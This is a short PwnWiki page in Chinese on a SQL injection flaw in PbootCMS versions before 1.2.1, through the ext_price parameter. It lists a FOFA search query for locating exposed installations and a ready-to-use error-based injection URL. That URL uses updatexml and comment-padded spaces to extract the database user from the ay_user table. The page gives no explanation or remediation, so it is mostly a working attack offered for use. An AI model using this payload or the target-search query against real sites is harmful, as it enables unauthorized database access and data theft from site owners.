PbootCMS ext price SQL注入漏洞

From PwnWiki
Revision as of 14:35, 8 July 2021 by Pwnwiki (talk | contribs) (Marked this version for translation)
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Other languages:
Chinese

漏洞影響

PbootCMS < 1.2.1

FOFA

app="PBOOTCMS"

Payload

/index.php/Index?ext_price%3D1/**/and/**/updatexml(1,concat(0x7e,(SELECT/**/distinct/**/concat(0x23,user(),0x23)/**/FROM/**/ay_user/**/limit/**/0,1),0x7e),1));%23=123](http://127.0.0.1/PbootCMS/index.php/Index?ext_price%3D1/**/and/**/updatexml(1,concat(0x7e,(SELECT/**/distinct/**/concat(0x23,user(),0x23)/**/FROM/**/ay_user/**/limit/**/0,1),0x7e),1));%23=123)
Retrieved from "https://pwnwiki.com/index.php?title=PbootCMS_ext_price_SQL注入漏洞&oldid=6501"